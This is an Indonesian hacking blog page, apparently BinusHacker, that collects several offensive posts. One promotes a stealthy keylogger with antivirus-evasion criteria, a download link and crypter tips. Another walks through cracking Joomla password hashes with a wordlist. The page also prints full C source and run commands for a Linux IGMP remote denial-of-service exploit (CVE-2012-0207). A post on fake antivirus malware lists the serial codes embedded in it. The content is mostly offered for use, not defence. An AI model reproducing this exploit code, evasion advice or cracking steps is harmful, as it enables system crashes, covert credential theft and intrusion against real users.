Cara Menyembunyikan Data Rahasia

Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it ...

Ini Alasan Kenapa Jangan Nonton Porno Pakai VPN Gratisan

Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it ...

Tugas dasar untuk membuat presentasi PowerPoint

Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it ...

HACKINTRO
Artikel ini Saya tulis untuk memenuhi permintaan rekan-rekan melalui email yang penasaran terhadap tool yang disebut Key Logger. Kebetulan hari ini Saya sedang cuti kerja beberapa hari, jadi Saya mempunyai banyak waktu untuk membuka beberapa arsip lama Hack Tool yang tersimpan di server pribadi Saya. Untung semua source code masih tersimpan dengan baik, jadi Saya tidak perlu menulis ulang kode-kode konyol ini. Saya lebih menyukai mempergunakan jari tangan Saya untuk bermain gitar dan membedah hewan. Jari yang keriting terlalu banyak coding tidak mungkin di-rebonding

Hasil gambar untuk Keylogger: Tool

KEY LOGGER (KEYSTROKE LOGGER) DEFINITION
Adalah suatu program yang berjalan di belakang sistem (Background), merekam semua tombol. Sekali Key Logger dijalankan, maka otomatis akan bersembunyi di dalam mesin untuk mencatat semua data atau mengirimkan datanya secara langsung ke pemilik Key Logger.
Pemilik Key Logger kemudian membaca data yang didapatkan tersebut dengan teliti dengan harapan menemukan kata sandi (Password) atau mungkin informasi lain yang bermanfaat yang bisa digunakan sebagai serangan Social Engineering. Key Logger secara sederhana bisa dikategorikan sebagai Hack Tool Pencuri Informasi. Sebagai contoh, Key Logger dapat mengungkapkan isi dari semua e-mail yang ditulis oleh korban. Program Key Logger biasanya terdapat di dalam rootkit dan trojan.
Key Logger berfungsi untuk merekam (mencatat) semua aktifitas pengguna komputer dengan mengambil input data melalui karakter keyboard yang digunakan oleh user. Jadi jika user mengetikkan kata “SaYa” melalui keyboard maka secara otomatis Key Logger akan mencatatnya pada sebuah LOG file dengan data “SaYa”.

HACK TOOL = UTILITIES = KEY LOGGER?
Jika ada pertanyaan, apakah Key Logger itu termasuk tool jahat? atau sejenis software utilities yang baik? Terus terang hanya Anda yang bisa menjawabnya. Kelebihan manusia dengan makhluk lain adalah mampu membedakan mana hal yang baik dan mana hal yang tidak baik.
A) Angel Style..?
Key Logger sering dipergunakan sebagai parental advisory (kontrol orang tua) untuk mengawasi kegiatan anak-anak mereka saat mempergunakan komputer. Selain itu juga sering dipergunakan oleh pemilik internet cafe (warnet), network sharing, dan lainnya untuk mengawasi aktifitas user. Contoh : Pembatas konten dewasa (pr0n), kontrol orang tua terhadap topik pembicaraan anak di internet, etc.
B) Evil Style..?
Di sisi lain Key Logger jika disalahgunakan akan sangat merugikan sekali, terutama bagi user yang menjadi target penyalahgunaan tool Key Logger. Semua karakter yang diketikkan melalui keyboard akan tercatat dengan baik pada LOG file. Entah itu password, Username, nomer PIN bank, account FTP/Facebook/etc. Dari sini Anda tentu bisa membayangkan apa yang akan terjadi jika Anda dan komputer Anda menjadi target kejahatan ini.

TIPS TO PICK BEST STUFF
Key Logger bisa dikategorikan cukup baik dan mampu diandalkan jika memenuhi beberapa kriteria sebagai berikut :
A) Keberadaannya TIDAK TERDETEKSI oleh Antivirus, Anti-Malware dan lainnya,
Anda boleh saja bangga mempunyai Key Logger canggih dan keren, Anda boleh saja menghabiskan uang tabungan Anda untuk membeli software Key Logger yang banyak tersedia di internet. Fakta yang ada adalah 99% Key Logger yang terdapat di internet sudah teridentifikasi oleh Antivirus. Key Logger berharga mahal dan terkenal sekalipun jika sudah terdeteksi oleh Antivirus apa bisa dipergunakan???
B) Memiliki ukuran (Size) yang relatif KECIL < 50 KB,
Size DOES Matter, ukuran itu penting. Key Logger dengan size besar >50KB (seperti monster Godzilla Size DOESN’T Matter) akan menimbulkan kecurigaan di komputer korban. Selain itu proses dan loadingnya sudah pasti lebih lama. Hal ini tidaklah efektif.
C) PORTABLE dan KETERGANTUNGAN resource (dependency),
Key Logger harus bisa disalin dan dijalankan pada komputer berbeda tanpa memerlukan installasi yang rumit dan minimum requirement yang berbelit-belit. Sebagai contoh : Program yang ditulis dengan menggunakan MS Visual Basic sebagian besar bergantung pada MSVBVM.DLL, jika pada komputer korban tidak terdapat MSVBVM.DLL maka Key Logger tidak akan dapat dijalankan!!!
Apa ya solusi yang tepat? Oya, bagaimana jika meminta korban untuk mendownload file MSVBVM.DLL serta menjelaskan kepada korban bahwa di komputernya terdapat Key Logger milik Anda yang tidak akan bisa dijalankan tanpa mendownload file tersebut? Solusi GILA tersebut tentu akan membuat mata Anda lebam 3 hari 3 malam karena terkena tendangan maut dari korban yang tidak terima komputernya disusupi oleh Key Logger Anda.
Bagaimana dengan solusi attachment? Solusi menyisipkan MSVBVM.DLL di dalam Key Logger juga adalah sebuah solusi yang GILA karena akan mengakibatkan size Key Logger bertambah besar! Solusi yang tepat adalah kode optimisasi atau pergunakan bahasa pemrograman yang fleksibel, misal Assembly.

SOME USEFUL APIS
Berikut ini Saya lampirkan Referensi Programmer untuk Microsoft Win32 mengenai beberapa fungsi API utama yang sering dipergunakan dalam pemrograman Key Logger :
Hooks (Referensi user32.dll)
Hook adalah suatu point dalam mekanisme penanganan-pesan Microsoft® Windows® di mana sebuah aplikasi dapat menginstal suatu subroutine untuk memonitor lalu-lintas pesan di dalam sistem dan memproses jenis tertentu dari pesan-pesan sebelum menjangkau prosedur jendela target. Untuk mempelajari lebih lanjut, silahkan Anda membaca artikel Saya yang berjudul “Menembus proteksi Password dan Serial Number pada program dengan trik Win32 Hook”
RegisterHotKey (Referensi user32.dll)
Fungsi RegisterHotKey menggambarkan suatu kunci untuk menyisipkan thread.
BOOL RegisterHotKey(
HWND hWnd, // window to receive hot-key notification
int id, // identifier of hot key
UINT fsModifiers, // key-modifier flags
UINT vk // virtual-key code
);
GetMessage (Referensi user32.dll)
Fungsi GetMessage mengambil kembali sebuah pesan dari antrian thread pemanggilan pesan dan menempatkannya di struktur yang ditetapkan. Fungsi Ini dapat mengambil kembali kedua pesan yang berhubungan dengan jendela yang ditetapkan dan thread mengeposkan pesan-pesan melalui fungsi PostThreadMessage. Fungsi mengambil kembali pesan-pesan yang berada di dalam cakupan yang ditetapkan dari nilai pesan. GetMessage tidak mengambil kembali pesan untuk jendela yang dimiliki oleh thread atau aplikasi lain.
BOOL GetMessage(
LPMSG lpMsg, // address of structure with message
HWND hWnd, // handle of window
UINT wMsgFilterMin, // first message
UINT wMsgFilterMax // last message
);
GetKeyboardState (Referensi user32.dll)
Fungsi GetKeyboardState menyalin status 256 tombol virtual ke buffer yang ditetapkan.
BOOL GetKeyboardState(
PBYTE lpKeyState // address of array to receive status data
);
GetKeyNameText (Referensi user32.dll)
Fungsi GetKeyNameText mengambil kembali sebuah string yang menampilkan nama dari sebuah key.
int GetKeyNameText(
LONG lParam, // second parameter of keyboard message
LPTSTR lpString, // address of buffer for key name
int nSize // maximum length of key-name string length
);
GetKeyState (Referensi user32.dll)
Fungsi GetKeyState mengambil kembali status dari kunci virtual yang ditetapkan. Status tersebut menetapkan apakah kunci up, down, atau toggle (on, off ¾ bertukar-tukar setiap kali kunci ditekan).
SHORT GetKeyState(
int nVirtKey // virtual-key code
);
GetAsyncKeyState (Referensi user32.dll)
Fungsi GetAsyncKeyState menentukan apakah suatu kunci up atau down pada saat fungsi dipanggil, dan apakah kunci ditekan setelah pemanggilan sebelumnya ke GetAsyncKeyState.
SHORT GetAsyncKeyState(
int vKey // virtual-key code
);

PROOF OF CONCEPT
MRHPx Key Logger v1.8 (PUBLIC VERSION) mungkin adalah Key Logger terkecil di dunia, dengan size hanya sebesar 10.5 KB (10,752 bytes) tanpa kompresi! Untuk mendapatkannya Anda bisa mendowloadnya di website Saya. Jalankan file “MRHPx-Key-Logger.exe” dengan cara klik ganda dengan mouse. Key Logger akan menciptakan LOG file dengan nama “MRHPx-KeyLogger-v1.8-PUBLICVERSION-Log.txt” pada lokasi direktori yang sama dengan tempat executable berada.

Binus Hacker Keylogger
Screenshot 1. Applications Tab Task Manager

Saya menggunakan bahasa pemrograman Assembly 32 bit (bukan Assembly 16 bit yang sudah ketinggalan jaman) untuk coding Key Logger ini. Assembly 32 bit setara dengan C/C++, Delphi, VB, kelebihan lainnya adalah lebih cepat. Ingat, Key Logger ini tidak terlihat pada Applications Tab Task Manager, tidak memiliki GUI (User Interface) apalagi sampai warna-warni seperti bendera partai pada saat pemilu. Konsep Saya adalah membuat Key Logger dengan resource minimalis tapi powerful bak PANAH DEWA seperti rootkit SWISS ARMY KNIFE lainnya yang berjalan secara background..

Keylogger
Screenshot 2. LOG file

Selanjutnya silahkan Anda mengetik apapun dengan menggunakan keyboard hardware ataupun virtual keyboard. Aplikasi apapun yang Anda pergunakan untuk mengetik data akan tersimpan dengan baik pada LOG file secara terpisah. LOG file akan menyimpan data secara berkala setiap kali aplikasi baru dijalankan. Untuk membaca LOG file Anda tidak perlu keluar dari aplikasi karena Saya tidak men-setting batasan hak akses file user. Bagi Anda yang ingin mengetahui lebih lanjut beberapa fitur yang lain silahkan Anda membaca file “BACA_AKU.txt” yang disertakan. Untuk keluar dari aplikasi Key Logger silahkan tekan secara bersamaan tombol “CTRL+ALT+P” pada Keyboard Anda.

FINAL NOTES
Key Logger sangat berbahaya jika dipergunakan sebagai alat kejahatan. Sepintas memang terlihat sepele, karena pada umumnya data yang tersimpan di dalam LOG file cukup acak (CATATAN: beberapa Shareware Key Logger di internet memiliki LOG file yang sangat amburadul karena dibuat secara asal oleh coder BEGO dan MATRE). Namun apa yang terjadi jika data LOG file tersebut dipergunakan sebagai Dictionary Bruteforce dengan bantuan tool seperti John the Ripper dan lainnya??? Untuk memperoleh informasi username dan password korban, data yang semula acak dan sepele akan menjadi dictionary efektif dan bisa dipergunakan sebagai akses login hanya dalam hitungan menit.
Contoh lain adalah jika Anda seorang guru atau dosen dan memiliki siswa yang ternyata seorang hacker (Maksud Saya Cracker), bukan tidak mungkin siswa Anda akan selalu mendapatkan nilai terbaik pada saat ujian karena siswa Anda memasang Key Logger di laptop yang Anda pergunakan untuk menyusun naskah ujian. Tanpa perlu belajar keras, cukup membaca naskah ujian yang telah dicuri oleh Key Logger, siswa Anda akan terlihat menyamai kepintaran Bapak Habibie dalam mengerjakan ujian keesokan harinya
Mengerikan bukan? Namun jangan kuatir karena ada cara sederhana dan efektif untuk mencegah komputer Anda disusupi oleh Key Logger yaitu dengan mengaktifkan User Account Control (UAC), memeriksa Registry Autorun dan Service Startup Windows serta memeriksa aplikasi yang berjalan secara background dan terlihat mencurigakan di komputer Anda.
Untuk metode lain, seperti heuristic detection antivirus, firewall dan sebagainya, sepengetahuan Saya hal tersebut kurang efektif. Karena hacker tidak memerlukan waktu yang lama mensiasati deteksi Antivirus yang hampir selalu berdasarkan pada algoritma signature (TradeMark virus). Hanya dengan merubah beberapa baris kode yang terdapat pada source code, maka Hack Tool tidak akan terdeteksi lagi oleh Antivirus. Efektifitas signature yang terdapat dalam database antivirus hanyalah untuk Hack Tool yang dirilis secara PUBLIC VERSION bukan PRIVATE VERSION. Metode lain sebagai alternatif yang cepat dan mudah yang sering dipilih oleh hacker untuk melewati deteksi Antivirus yaitu dengan menggunakan Stub UD atau Stub Commercial Protector. Semoga artikel ini bermanfaat dan dapat membantu Anda mengamankan diri dari kejahatan cyber. NB : untuk orang-orang gak tahu malu, gak ada keinginan belajar, sukanya gratisan, pengennya langsung pakai, yang hobi request crack, hack tool, cheat game online, hack facebook, hack website dan lainnya melalui email Saya, kalian gak ada kerjaan lain apa??? Kenapa gak sekalian aja minta nomer PIN BCA, Account Paypal, Credit Card, tunjangan sosial dan uang di dompet Saya???

Download Keylogger

 THANX TO :)

read more

Bagi yang belum tahu, saat ini banyak Antivitus untuk menangani Virus, Spyware, Malware, Dsb palsu beredar di Internet. Kalangan awam takkan pernah tahu hal ini, karena biasanya kalau dengan Antivirus Gratis Tahun “2011”, langsung aja maen download.
Berikut adalah hasil analisa Steven K a.k.a @Xylit0l, membedah tools-tools ini dengan disassembler / debugger. Hasil pembedahannya dari tools-tools palsu tersebut adalah sebagai berikut


Security Solution 2011 adalah software security palsu (rogue). Ini juga hampir sama dengan: Antivirus Antispyware 2011, AntiVirus System 2011, Security Inspector 2010, AntiVirus Studio 2010, Desktop Security 2010, Total PC Defender 2010, Desktop Defender 2010, Contraviro, UnVirex!
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiA1rxyDMs9xufKPGtv5Bl1BuPAoIYJqWidFxc5u7fHwSuRZ4cSuNnqDqD_oDrF2ZB4CGRkrecDS2r-9-bbt405S75ypLs4aye9HcFt5SJhXsmK2o7UKs-k87l37fadQ5N_kF8uWxmyZkh5/s400/secsol.png

Security Solution 2011 menampilkan banyak pesan yang mengharuskan pengguna untuk membeli lisensi.
Untuk melakukan registrasi (dan help removal), silakan masukkan serial code berikut yang sebenarnya sudah tertanam dalam program: LIC2-00A6-234C-B6A9-38F8-F6E2-0838-F084-E235-6051-18B3
Suspended page palsu yang ditampilkan:

Malware Protection


Malware Protection adalah tools antivirus palsu. Tools ini juga sama palsunya dengan Spyware Protection, Advanced Security Tool 2010, Security Central, Home Personal Antivirus, XP Deluxe Protector, Win PC Antivirus, Win PC Defender, XP Police Antivirus, IE-Security, WinDefender 2009 and Total Secure 2009. (Thanks to S!Ri for the list)
Tools palsu ini menampilkan pesan infeksi palsu malware yang banyak, seperti contoh gambar diatas dan menampilkan alert kepada pengguna untuk menakut-nakuti.
Untuk melakukan registrasi dan menghapus alert, silakan gunakan serial code berikut yang sudah tertanam di dalam software: SL55J-T54YHJ61-YHG88

FAKE AV DOWNLOAD

Selanjutnya adalah hasil analisa AntiVirus palsu dari VirusIndonesia[dot]com, berikut adalah hasilnya
FakeAV-Downloader.K
FakeAV-Downloader.K. Serangan antivirus palsu masih banyak dijumpai. Teknik yang digunakan cukup beragam, mulai dari pesan palsu yang memanfaatkan fasilitas chatting atau jejaring sosial, ataupun email palsu yang berisi pesan dengan melampirkan sebuah attachment dan berasal dari account yang tidak Anda kenal.
A. Info Malware
Nama: FakeAV-Downloader.K
Asal: Rusia (dugaan)
Ukuran File: 324 KB
Packer: –
Pemrograman: Microsoft Visual C++
Icon: Windows XP Application
Tipe: Trojan Downloader
B. Tentang Malware
Fake Antivirus atau Antivirus palsu termasuk salah satu malware yang sudah tidak asing lagi bagi beberapa pengguna komputer. Banyaknya kejadian di mana seorang user yang tanpa sengaja mendownload sebuah program yang kemudian dijalankan, dan antivirus palsu langsung aktif di komputernya. Seperti pada gambar diatas yang isinya adalah sebuah email yang ditunjukkan kepada beberapa account dengan menyertakan attachment yang tidak jelas. Hasil yang ditimbulkan jika menjalankan file tersebut bisa sangat beragam, mulai dari pembajakan account pribadi, adanya keylogger, mendownload file lain dari website tertentu untuk di jalankan secara otomatis atau mendownload antivirus palsu seperti FakeAV-Downloader.K.
FakeAV-Downloader.K umumnya berasal dari website yang terkadang namanya terbilang cukup aneh. Setelah ditelusuri, terdapat satu buah kesamaan, bahwa dari beberapa domain yang berbeda, memilik satu buah account registrasi yang selalu sama. Contoh:
(Nama Random)
+7122740645 fax: +7122740645
Nevskij pr-kt d.134 lit.B pom.5N
Sankt-Peterburg Sankt-Peterburg 191036
RU

Website yang dibuat seolah menunjukkan tidak adanya ancaman bagi user, contohnya testimonial yang ditampilkan pada halaman utama website. Setelah ditelusuri lebih jauh, testimonial tersebut hanyalah hasil copy paste.
Testimonial yang yang sudah dirubah atau palsu:
“I tried a few different programs in my day. Absolutely none have ever been as effective as [Nama antivirus palsu]. While nothing is perfect, [Nama antivirus palsu] seems to strive to be as close as they can be in their craft. Thanks for making the ‘net possible for me and my family.”

Testimonial asli dari salah satu website antivirus:
“I tried a few different programs in my day. Absolutely none have ever been as effective as AVG. While nothing is perfect, AVG seems to strive to be as close as they can be in their craft. Thanks for making the ‘net possible for me and my family.”

C. Companion/File yang dibuat
Ada 3 buah file yang dibuat. 1 adalah host dari virus dan 2 lainnya adalah companionnya.
1. file host yang selalu ada di folder :
C:\Documents and Settings\[nama user]\Local Settings\Application Data\[nama acak].exe
2. File Temporary dengan nama acak
C:\Documents and Settings\[nama user]\Local Settings\Application Data\[nama acak] 3. File Dat dengan nama acak
C:\Documents and Settings\[nama user]\Local Settings\Application Data\[nama acak].Dat

D. Hasil Infeksi
Yang menarik dari malware ini adalah memiliki beragam caption aplikasi serta hampir seluruh teks utama dari interfacenya berubah, padahal file hostnya tetap sama. Nama nama yang digunakan antara lain adalah:
– XP Home Security 2011
– XP Anti-Virus 2011
– XP Home Security
– XP Security 2011
– XP Anti-Spyware 2011
– XP Anti-Spyware
– XP Internet Security 2011
– XP Total Security
Ini adalah beberapa screenshot dari FakeAV-Downloader.K:

Screenshot 1
Screenshot 2
Screenshot 3
Screenshot 4
Screenshot 4
Harga yang ditawarkan untuk antivirus palsu ini:
Screenshot 4
E. Pembersihan
Worm ini telah dikenali dan dapat dibersihkan pada PCMAV 5.0 Update Build3 ini berikut ini.
Scan
PCMAV 5.0 Update Build3
Untuk membasmi virus ini ataupun varian virus lainnya, PCMAV 5.0 Update Build3 telah hadir dengan penambahan 89 pengenal varian virus baru. Bagi Anda pengguna PCMAV 5.0, sangat disarankan segera melakukan update, agar PCMAV Anda dapat mengenali dan membasmi virus lebih banyak lagi.
Untuk mendapatkan dan menggunakan update PCMAV ini, Anda cukup menjalankan PCMAV.exe, komputer harus dalam keadaan aktif terhubung ke Internet. Jika koneksi Internet menggunakan proxy, tentukan konfigurasi proxy pada file proxy.txt . Fitur Automatic Updates dari PCMAV akan secara otomatis men-download dan meng-update database dari PCMAV. Anda juga dapat mengupdate kapan saja dengan klik kanan icon PCMAV pada system tray dan pilih Update.
Bagi Anda yang ingin mendapatkan file update tersebut secara manual, Anda bisa men-download file-nya melalui beberapa link ini:
SendSpace.com
ZippyShare.com
Rapidshare.com
Letakkan file hasil download tersebut (update.vdb) ke dalam folder \vdb. Jika sebelumnya telah terdapat file update yang lama, Anda cukup menimpanya. Pastikan sekali lagi, bahwa nama file update adalah update.vdb, jika berbeda, cukup ubah namanya. Dan nanti saat Anda kembali menjalankan PCMAV, ia sudah dalam keadaan kondisi ter-update.

Jadi, untuk sahabat-sahabat BinusHacker semuanya. Hati-hati menggunakan AntiVirus, masih banyak Antivirus Palsu yang beredar di “Download Software Gratisan

read more

Kembali Lagi Dengan Saya Sharing Mengenai Cracking,
Saatnya untuk melakukan crack password joomla dengan menggunakan Joomla Cracker Tools. Tools ini digunakan untuk melakukan BruteForce password dari hash yang didapatkan dari joomla password biasanya MD5+SALT

Hasil gambar untuk Cracking Joomla Password With Wordlist

Yang perlu disiapkan adalah:
1. Tools “joomla-cracker.pl” yang digunakan sebagai alat untuk melakukan bruteforce, download disini:
Download Cracker Tools 2. Buatlah file “hash.txt” yang akan digunakan untuk menyimpan hash yang akan di crack.
3. Buatlah file “wordlist.txt” yang akan digunakan sebagai kumpulan dictionary password. Download wordlist generator disini.

Download Worldlist Generator Tools
4. Perl Engine harus sudah terinstall di Operating System yang akan di pakai.

Setelah semua file terlengkapi, maka cara menjalankannya adalah ./joomla-cracker.pl hash.txt wordlist.txt
1. Kumpulan file dalam directory hacking untuk melakukan crack joomla hash + salt.
Kumpulan File Cracking

2. Contoh hash yang perlu dimasukkan dalam file “hash.txt

Kumpulan Hash Joomla

3. Contoh kumpulan wordlist yang dimasukkan dalam file “wordlist.txtKumpulan Wordlist

4. Berikut adalah cara menjalankan joomla-cracker tools ./joomla-cracker.pl hash.txt wordlist.txt

Hasil Dari Menjalankan Cracker Joomla Password

Nah terlihat hasilnya disana bahwa hasil crack username + passwordnya adalah:
1. Username: rahmat & Password: 123456
2. Username: dede & Password: 123456
3. Dst.
Selamat mencoba dan semoga berhasil mengcrack joomla username & password

read more

Assalamualaikum sahabat apa kabar nya ?
Bertemu sama saya lagi nih, Jhon Islanksha
Kesempatan kali ini, saya mau membahas seputar cracking source nih, gantian dulu bahas masalah deface, karena saya sudah tobat hehe
Masalahnya saya dilarang cewe saya
Okay dah tanpa panjang lebar lagi, mari kita bahas.

Apa itu Resource Hacker ??? dari judul nya saja mungkin anda sudah bisa menebak, bahwa ini merupakan Software FreeWare yang tugas nya.
1. Membuka source kode dari (*.exe, *.dll, *.cpl, *.ocx)
2. Merubah dan mengedit source secara langsung.
3. Memodifikasi secara langsung.

Nah 3 itu merupakan pokok penting dari Resource Hacker.
Kita ketahui dan kita pikir ? jika kita bisa membuka source dari software, berarti kita bisa membuat software itu juga hehehe.
Berbanggala anda pada diri anda sendiri.
Ini saya kasih SnapShot nya



Gambar di atas, saya lagi mau membuka source dari PhotoScape.
Setelah saya buka, dan saya buka table dialog, maka saya dapat kode sama tampilan nya seperti apa ? lihat gambar di bawah ini.


https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiR3uB4A_9u7gc88nP9J7qrsiHwJltyYbemA57-XQn7EV5yieyKSOOQYA9d9D-ouJ-NbvJ8SXQWRI3yyxed8RIdwEPdJSDbupaMeVYQyWKfhTP_uaC78ueCiSjWz8kTpXi1cUEudmcxJlzw/s1600/040-952.png

Okay mantap bukan ?? :-bd
Wuzup dah hehe, bagi kalian yang mau atau berminat ?
Silakan di download di sini


Download Disini
Download Cracker Tools
Pelajari sendiri bagaimana cara pakai nya, biar anda bisa menjadi seorang master hehe.
Semoga bermanfaat ya :)
Wassalamualaikum

read more

http://www.binushacker.net/wp-content/uploads/ddos-attack-linux-kernel.jpg
Kali ini kami akan berbagi mengenai bagaimana cara DoS menggunakan tools berikut terhadap linux server. DOS kali ini akan menggunakan kelemahan pada bugs IGMP.

Oke yang perlu dipersiapkan adalah:
  1. Siapkan server / pc untuk mengcompile source ddos.
  2. Siapkan pc target linux, bisa random / yang memiliki kernel 2.6.36
  3. Memulai attack
Berikut adalah code DoS tools:

/*
** attacklinux.c
** Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)
** CVE-2012-0207
** Credits to Ben Hutchings:
** THIS code wich can attack NOT just LAN, is NOT kcopes and, is based more on the ICMPv3 membership query bug... wich was for windows but also affects linux, in IMPv3 tho  go figure... anyhow, this can now be easily made into a very fast packet machine ,and since it doesnt care what the ips are, i guess could be seen results, remotely... feel free to update/send in comment... all comments, go thru ME, XD , before any type of publishing, so be sure that codes are safe and, i only put here, corrected codes...simple... so, please dont go adding it to your lame d0s collection coz, ill just fark it up , and, i mean, the packet is easy to block since it is released...right
XD loves u all
** Example:
** ./attacklinux SRC_IP DST_IP
** The Linux Kernel at the remote side will Panic
** when sent over the network -still in testing!
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>

struct iphdr {
unsigned char ihl:4, version:4, tos;
unsigned short tot_len, id, frag_off;
unsigned char ttl, protocol;
unsigned short check;
unsigned int saddr, daddr;
unsigned int options1;
unsigned int options2;
};

struct igmp_query {
unsigned char type;
unsigned char maxresponse;
unsigned short csum;
unsigned int mcast;
char padding[40];
};

// unsigned short in_chksum(unsigned short *, int);  // removed by xd , thx for trying to cripple but no work

unsigned short in_chksum(unsigned short *addr, int len);         // this was crippled, notice that this was uptop, so you dd not see the
// bugged up in_chksum wich wont make this works <img src="http://crazycoders.com/wp-includes/images/smilies/icon_smile.gif" alt=":)">  NOW try it.
unsigned short in_chksum(unsigned short *addr, int len) {
register int nleft = len;
register int sum = 0;
u_short answer = 0;
while (nleft > 1) {
sum += *addr++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *)(&amp;answer) = *(u_char *)addr;
sum += answer;
}
sum = (sum >> 16) + (sum &amp; 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}

long resolve(char *);
long resolve(char *host) {
struct hostent *hst;
long addr;
hst = gethostbyname(host);
if (hst == NULL)
return(-1);
memcpy(&amp;addr, hst->h_addr, hst->h_length);
return(addr);
}

int main(int argc, char *argv[]) {
struct sockaddr_in dst;
struct iphdr *ip;
struct igmp_query *igmp;
long daddr, saddr;
int s, i=0, c, len, one=1;
char buf[1500];
if (argc < 3) {
printf("Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)\n"
"credits to Ben Hutchings but this is NOT kcopes code nor firestorms so, author stays anon\n");
printf("Usage: %s <src ip> <dst ip>\n", *argv); // yea, try any ip and see, i guess its worth a shot... or not <img src="http://crazycoders.com/wp-includes/images/smilies/icon_razz.gif" alt=":P">
return(1);
}
daddr = resolve(argv[2]);
saddr = resolve(argv[1]);
memset(buf, 0, 1500);
ip = (struct iphdr *)&amp;buf;
igmp = (struct igmp_query*)&amp;buf[sizeof(struct iphdr)];
dst.sin_addr.s_addr = daddr;
dst.sin_family = AF_INET;
ip->ihl = 7;
ip->version = 4;
ip->tos = 0;
ip->tot_len = htons(sizeof(struct iphdr)+8);
ip->id = htons(18277);
ip->frag_off=0;
ip->ttl = 1;
ip->protocol = IPPROTO_IGMP;
ip->check = in_chksum((unsigned short *)ip, sizeof(struct iphdr));
ip->saddr = saddr;
ip->daddr = daddr;
ip->options1 = 0;
ip->options2 = 0;
igmp->type = 0x11;
igmp->maxresponse = 0xff;
igmp->mcast=inet_addr("0.0.0.0");  // mod here ,now we can attack the IP we actually put in
igmp->csum = 0; //For computing the checksum, the Checksum field is set to zero.
igmp->csum=in_chksum((unsigned short *)igmp, 8);
s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (s == -1)
return(1);
printf("Sending IGMP packet: %s -> %s\n", argv[1], argv[2]);
if (sendto(s,&amp;buf,sizeof(struct iphdr)+8,0,(struct sockaddr *)&amp;dst,sizeof(struct sockaddr_in)) == -1) {
perror("Error sending packet");
exit(-1);
}
close(s);
s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (s == -1)
return(1);
ip->id = htons(18278);
ip->tot_len = sizeof(struct iphdr)+12;
igmp->type = 0x11;
igmp->maxresponse = 0;
igmp->mcast=inet_addr("0.0.0.0");
igmp->csum = 0; //For computing the checksum, the Checksum field is set to zero.
igmp->csum=in_chksum((unsigned short *)igmp, 12);
printf("Sending packet: %s -> %s\n", argv[1], argv[2]);
if (sendto(s,&amp;buf,sizeof(struct iphdr)+12,0,(struct sockaddr *)&amp;dst,sizeof(struct sockaddr_in)) == -1) {
perror("Error sending packet");
exit(-1);
}
return(0);
}


Cara menjalankannya adalah
  1. Simpan code di atas dengan nama file: dos-linux.c
  2. Compile source diatas menggunakan gcc: gcc dos-linux.c -o attacklinux
  3. Kemudian setelah selesai jalankan dengan perintah: ./attacklinux source_ip destination_ip , misal: ./attacklinux 127.0.0.1 10.10.10.10
Download Source Code Toolsnya Disini
Download Cracker Tools
Apabila berhasil, maka pada server akan tampil error log seperti berikut:


binushacker $ gcc dos-linux.c -o attacklinux
binushacker $ ./attacklinux 127.0.0.1 10.10.10.10
[  274.903179] netconsole: local IP 0.0.0.0
[  274.903181] netconsole: interface 'eth0'
[  274.903185] netconsole: remote IP 10.10.10.10
[  274.903191] netconsole: local IP 127.0.0.1
[  274.903244] console [netcon0] enabled
[  274.903247] netconsole: network logging started
[  283.360160] usb 4-2: new full speed USB device number 4 using uhci_hcd
[  283.526265] usb 4-2: New USB device found, idVendor=0a5c, idProduct=2145
[  283.526280] usb 4-2: New USB device strings: Mfr=1, Product=2, SerialNumber=0
[  283.526289] usb 4-2: Product: ThinkPad Bluetooth with Enhanced Data Rate II
[  283.526297] usb 4-2: Manufacturer: Lenovo Computer Corp
[ 2171.144135] usb 4-2: USB disconnect, device number 4
[ 2178.490539] wlan0: deauthenticating from 10.10.10.10 by local choice (reason=3)
[ 2178.506572] cfg80211: Calling CRDA to update world regulatory domain
[ 2178.523720] cfg80211: World regulatory domain updated:
[ 2178.523741] cfg80211:     (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp)
[ 2178.523752] cfg80211:     (2402000 KHz - 2472000 KHz @ 40000 KHz), (300 mBi, 2000 mBm)
[ 2178.523762] cfg80211:     (2457000 KHz - 2482000 KHz @ 20000 KHz), (300 mBi, 2000 mBm)
[ 2178.523772] cfg80211:     (2474000 KHz - 2494000 KHz @ 20000 KHz), (300 mBi, 2000 mBm)
[ 2178.523781] cfg80211:     (5170000 KHz - 5250000 KHz @ 40000 KHz), (300 mBi, 2000 mBm)
[ 2178.523791] cfg80211:     (5735000 KHz - 5835000 KHz @ 40000 KHz), (300 mBi, 2000 mBm)
[ 4622.662356] iwlagn 0000:03:00.0: L1 Disabled; Enabling L0S
[ 4622.662756] iwlagn 0000:03:00.0: Radio type=0x0-0x2-0x0
[ 4622.717229] ADDRCONF(NETDEV_UP): wlan0: link is not ready
[ 4630.334443] wlan0: authenticate with 10.10.10.10 (try 1)
[ 4630.336213] wlan0: authenticated
[ 4630.340174] wlan0: associate with 10.10.10.10 (try 1)
[ 4630.356310] wlan0: RX AssocResp from 10.10.10.10 (capab=0x431 status=0 aid=2)
[ 4630.356318] wlan0: associated
[ 4630.362820] ADDRCONF(NETDEV_CHANGE): wlan0: link becomes ready
[ 4640.576058] wlan0: no IPv6 routers present
[ 7853.283020] Monitor-Mwait will be used to enter C-3 state
[ 7853.285825] thinkpad_acpi: EC reports that Thermal Table has changed
[16107.346657] thinkpad_acpi: EC reports that Thermal Table has changed
[16111.048524] divide error: 0000 [#1] SMP
[16111.048627] CPU 1
